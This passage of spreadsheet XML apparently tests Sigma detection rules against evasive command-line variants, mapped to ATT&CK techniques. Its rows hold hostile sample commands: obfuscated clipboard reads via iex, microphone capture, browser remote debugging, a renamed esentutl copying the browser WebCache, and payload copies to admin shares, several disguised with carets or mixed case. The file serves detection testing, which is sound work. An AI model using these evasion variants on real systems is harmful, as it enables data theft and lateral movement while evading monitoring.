      <c r="I46" s="43" t="n"/>
      <c r="J46" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K46" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="47" ht="15.75" customHeight="1" s="42">
      <c r="A47" s="43" t="inlineStr">
        <is>
          <t>t1115</t>
        </is>
      </c>
      <c r="B47" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_get_clipboard</t>
        </is>
      </c>
      <c r="C47" s="44" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI</t>
        </is>
      </c>
      <c r="D47" s="44" t="inlineStr">
        <is>
          <t>b9aeac14-2ffd-4ad3-b967-1354a4e628c3</t>
        </is>
      </c>
      <c r="E47" s="44" t="inlineStr">
        <is>
          <t>"powershell.exe" &amp; {echo Get-Process | clip
Invoke-Expression ('Get-' + 'Clipboard') | iex}</t>
        </is>
      </c>
      <c r="F47" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G47" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H47" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I47" s="44" t="n"/>
      <c r="J47" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K47" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="48" ht="15.75" customHeight="1" s="42">
      <c r="A48" s="43" t="inlineStr">
        <is>
          <t>t1123</t>
        </is>
      </c>
      <c r="B48" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_audio_capture</t>
        </is>
      </c>
      <c r="C48" s="43" t="inlineStr">
        <is>
          <t>Audio Capture via PowerShell</t>
        </is>
      </c>
      <c r="D48" s="43" t="inlineStr">
        <is>
          <t>932fb0d8-692b-4b0f-a26e-5643a50fe7d6</t>
        </is>
      </c>
      <c r="E48" s="43" t="inlineStr">
        <is>
          <t>"powershell.exe" &amp; {$mic = Get-AudioDevice  -Recording
Set-AudioDevice  -ID $mic.ID
Start-Sleep -Seconds 5}</t>
        </is>
      </c>
      <c r="F48" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G48" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H48" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I48" s="43" t="n"/>
      <c r="J48" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K48" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="49" ht="15.75" customHeight="1" s="42">
      <c r="A49" s="44" t="inlineStr">
        <is>
          <t>t1123</t>
        </is>
      </c>
      <c r="B49" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_audio_capture</t>
        </is>
      </c>
      <c r="C49" s="44" t="inlineStr">
        <is>
          <t>Audio Capture via PowerShell</t>
        </is>
      </c>
      <c r="D49" s="44" t="inlineStr">
        <is>
          <t>932fb0d8-692b-4b0f-a26e-5643a50fe7d6</t>
        </is>
      </c>
      <c r="E49" s="43" t="inlineStr">
        <is>
          <t>"powershell.exe" &amp; {$mic = &amp; 'Get-AudioDevice' -Recording
&amp; 'Set-AudioDevice' -ID $mic.ID
Start-Sleep -Seconds 5}</t>
        </is>
      </c>
      <c r="F49" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G49" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H49" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I49" s="43" t="n"/>
      <c r="J49" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K49" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="50" ht="15.75" customHeight="1" s="42">
      <c r="A50" s="43" t="inlineStr">
        <is>
          <t>t1185</t>
        </is>
      </c>
      <c r="B50" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_remote_debugging</t>
        </is>
      </c>
      <c r="C50" s="44" t="inlineStr">
        <is>
          <t>Browser Started with Remote Debugging</t>
        </is>
      </c>
      <c r="D50" s="44" t="inlineStr">
        <is>
          <t>b3d34dc5-2efd-4ae3-845f-8ec14921f449</t>
        </is>
      </c>
      <c r="E50" s="43" t="inlineStr">
        <is>
          <t>chrome.exe "--remote-debugging-port=9222"</t>
        </is>
      </c>
      <c r="F50" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G50" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H50" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I50" s="43" t="n"/>
      <c r="J50" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K50" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="51" ht="15.75" customHeight="1" s="42">
      <c r="A51" s="43" t="inlineStr">
        <is>
          <t>t1185</t>
        </is>
      </c>
      <c r="B51" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_remote_debugging</t>
        </is>
      </c>
      <c r="C51" s="44" t="inlineStr">
        <is>
          <t>Browser Started with Remote Debugging</t>
        </is>
      </c>
      <c r="D51" s="44" t="inlineStr">
        <is>
          <t>b3d34dc5-2efd-4ae3-845f-8ec14921f449</t>
        </is>
      </c>
      <c r="E51" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c chrome.exe --remote-debugging^--port=9222</t>
        </is>
      </c>
      <c r="F51" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G51" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H51" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I51" s="43" t="n"/>
      <c r="J51" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K51" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="52" ht="15.75" customHeight="1" s="42">
      <c r="A52" s="44" t="inlineStr">
        <is>
          <t>t1005</t>
        </is>
      </c>
      <c r="B52" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_esentutl_webcache</t>
        </is>
      </c>
      <c r="C52" s="44" t="inlineStr">
        <is>
          <t>Esentutl Steals Browser Information</t>
        </is>
      </c>
      <c r="D52" s="44" t="inlineStr">
        <is>
          <t>6a69f62d-ce75-4b57-8dce-6351eb55b362</t>
        </is>
      </c>
      <c r="E52" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\esentutl.exe C:\Users\Public\not_esentutl.exe &amp;&amp; C:\Users\Public\not_esentutl.exe /r %LocalAppData%\Microsoft\Windows\WebCache\WebCacheV01.dat /"d"</t>
        </is>
      </c>
      <c r="F52" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G52" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H52" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I52" s="44" t="inlineStr">
        <is>
          <t>Esentutl Steals Browser Information (6a69f62d-ce75-4b57-8dce-6351eb55b362); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J52" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K52" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="53" ht="15.75" customHeight="1" s="42">
      <c r="A53" s="44" t="inlineStr">
        <is>
          <t>t1005</t>
        </is>
      </c>
      <c r="B53" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_esentutl_webcache</t>
        </is>
      </c>
      <c r="C53" s="44" t="inlineStr">
        <is>
          <t>Esentutl Steals Browser Information</t>
        </is>
      </c>
      <c r="D53" s="44" t="inlineStr">
        <is>
          <t>6a69f62d-ce75-4b57-8dce-6351eb55b362</t>
        </is>
      </c>
      <c r="E53" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\esentutl.exe C:\Users\Public\not_esentutl.exe &amp;&amp; C:\Users\Public\not_esentutl.exe /R %LocalAppData%\Microsoft\Windows\WebCache\WebCacheV01.dat /d</t>
        </is>
      </c>
      <c r="F53" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G53" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H53" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I53" s="44" t="inlineStr">
        <is>
          <t>Esentutl Steals Browser Information (6a69f62d-ce75-4b57-8dce-6351eb55b362); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J53" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K53" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="54" ht="15.75" customHeight="1" s="42">
      <c r="A54" s="44" t="inlineStr">
        <is>
          <t>t1005</t>
        </is>
      </c>
      <c r="B54" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_esentutl_webcache</t>
        </is>
      </c>
      <c r="C54" s="44" t="inlineStr">
        <is>
          <t>Esentutl Steals Browser Information</t>
        </is>
      </c>
      <c r="D54" s="44" t="inlineStr">
        <is>
          <t>6a69f62d-ce75-4b57-8dce-6351eb55b362</t>
        </is>
      </c>
      <c r="E54" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\esentutl.exe C:\Users\Public\not_esentutl.exe &amp;&amp; C:\Users\Public\not_esentutl.exe /R %LocalAppData%\Microsoft\Windows\WebCache\WebCacheV01.dat /D</t>
        </is>
      </c>
      <c r="F54" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G54" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H54" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I54" s="44" t="inlineStr">
        <is>
          <t>Esentutl Steals Browser Information (6a69f62d-ce75-4b57-8dce-6351eb55b362); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J54" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K54" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="55" ht="15.75" customHeight="1" s="42">
      <c r="A55" s="44" t="inlineStr">
        <is>
          <t>t1005</t>
        </is>
      </c>
      <c r="B55" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_esentutl_webcache</t>
        </is>
      </c>
      <c r="C55" s="44" t="inlineStr">
        <is>
          <t>Esentutl Steals Browser Information</t>
        </is>
      </c>
      <c r="D55" s="44" t="inlineStr">
        <is>
          <t>6a69f62d-ce75-4b57-8dce-6351eb55b362</t>
        </is>
      </c>
      <c r="E55" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\esentutl.exe C:\Users\Public\not_esentutl.exe &amp;&amp; C:\Users\Public\not_esentutl.exe /R %LocalAppData%\Microsoft\Windows\WebCache\WebCacheV01.dat /"d"</t>
        </is>
      </c>
      <c r="F55" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G55" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H55" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I55" s="44" t="inlineStr">
        <is>
          <t>Esentutl Steals Browser Information (6a69f62d-ce75-4b57-8dce-6351eb55b362); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J55" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K55" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="56" ht="15.75" customHeight="1" s="42">
      <c r="A56" s="44" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B56" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C56" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D56" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E56" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[System.IO.File]::Copy('C:\temp\payload.exe', '\\10.0.0.2\C$\payload.exe')"</t>
        </is>
      </c>
      <c r="F56" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G56" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H56" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I56" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J56" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K56" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="57" ht="15.75" customHeight="1" s="42">
      <c r="A57" s="44" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B57" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C57" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D57" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E57" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "[System.IO.File]::Copy('C:\temp\payload.exe', '\\10.0.0.2\C$\payload.exe')"</t>
        </is>
      </c>
      <c r="F57" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G57" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H57" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I57" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J57" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K57" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="58" ht="15.75" customHeight="1" s="42">
      <c r="A58" s="44" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B58" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C58" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D58" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E58" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ComMaNd "[System.IO.File]::Copy('C:\temp\payload.exe', '\\10.0.0.2\C$\payload.exe')"</t>
        </is>
      </c>
      <c r="F58" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G58" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H58" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I58" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J58" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K58" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="59" ht="15.75" customHeight="1" s="42">
      <c r="A59" s="44" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B59" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C59" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D59" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E59" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -comManD "[System.IO.File]::Copy('C:\temp\payload.exe', '\\10.0.0.2\C$\payload.exe')"</t>
        </is>
      </c>
      <c r="F59" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G59" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H59" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I59" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J59" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K59" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="60" ht="15.75" customHeight="1" s="42">
      <c r="A60" s="44" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B60" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C60" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D60" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E60" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C c^o^p^y C:\temp\file.txt \\192.168.1.10\C$\Windows\Temp\file.txt</t>
        </is>
      </c>
      <c r="F60" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G60" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H60" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I60" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J60" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K60" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="61" ht="15.75" customHeight="1" s="42">
      <c r="A61" s="44" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B61" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C61" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D61" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E61" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" c^o^p^y C:\temp\file.txt \\192.168.1.10\C$\Windows\Temp\file.txt</t>
        </is>
      </c>
      <c r="F61" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G61" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H61" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I61" s="43" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J61" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K61" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="62" ht="15.75" customHeight="1" s="42">
      <c r="A62" s="44" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B62" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C62" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D62" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E62" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" c^o^p^y C:\temp\file.txt \\192.168.1.10\C$\Windows\Temp\file.txt</t>
        </is>
      </c>
      <c r="F62" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G62" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H62" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I62" s="43" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J62" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K62" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="63" ht="15.75" customHeight="1" s="42">
      <c r="A63" s="44" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B63" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C63" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D63" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E63" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "(Get-Item 'C:\temp\file.txt').CopyTo('\\192.168.1.10\C$\Windows\Temp\file.txt')"</t>
        </is>
      </c>
      <c r="F63" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G63" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H63" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I63" s="44" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder (a6a39bdb-935c-4f0a-ab77-35f4bbf44d33); Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J63" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K63" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="64" ht="15.75" customHeight="1" s="42">
      <c r="A64" s="44" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B64" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C64" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D64" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E64" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "(Get-Item 'C:\temp\file.txt').CopyTo('\\192.168.1.10\C$\Windows\Temp\file.txt')"</t>
        </is>
      </c>
      <c r="F64" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G64" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H64" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I64" s="44" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder (a6a39bdb-935c-4f0a-ab77-35f4bbf44d33); Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J64" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K64" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="65" ht="15.75" customHeight="1" s="42">
      <c r="A65" s="44" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B65" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C65" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D65" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E65" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMAnd "(Get-Item 'C:\temp\file.txt').CopyTo('\\192.168.1.10\C$\Windows\Temp\file.txt')"</t>
        </is>
      </c>
      <c r="F65" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G65" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H65" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I65" s="43" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder (a6a39bdb-935c-4f0a-ab77-35f4bbf44d33); Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J65" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K65" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="66" ht="15.75" customHeight="1" s="42">
      <c r="A66" s="44" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B66" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C66" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D66" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E66" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOMMaND "(Get-Item 'C:\temp\file.txt').CopyTo('\\192.168.1.10\C$\Windows\Temp\file.txt')"</t>
        </is>
      </c>
      <c r="F66" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G66" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H66" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I66" s="43" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder (a6a39bdb-935c-4f0a-ab77-35f4bbf44d33); Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J66" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K66" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="67" ht="15.75" customHeight="1" s="42">
      <c r="A67" s="44" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B67" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C67" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D67" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E67" s="44" t="inlineStr">
        <is>
          <t>powershell -NoProfile -Command "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F67" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G67" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H67" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I67" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J67" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K67" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="68" ht="15.75" customHeight="1" s="42">
      <c r="A68" s="44" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B68" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C68" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D68" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E68" s="44" t="inlineStr">
        <is>
          <t>powershell -nop -commAND "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F68" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G68" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H68" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I68" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J68" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K68" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="69" ht="15.75" customHeight="1" s="42">
      <c r="A69" s="44" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B69" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C69" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D69" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E69" s="44" t="inlineStr">
        <is>
          <t>powershell -NoPRofILE -comMand "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F69" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G69" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H69" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I69" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J69" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K69" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="70" ht="15.75" customHeight="1" s="42">
      <c r="A70" s="44" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B70" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C70" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D70" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E70" s="44" t="inlineStr">
        <is>
          <t>powershell -nOPrOFiLE -c "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F70" s="44" t="b">
        <v>1</v>
      </c>
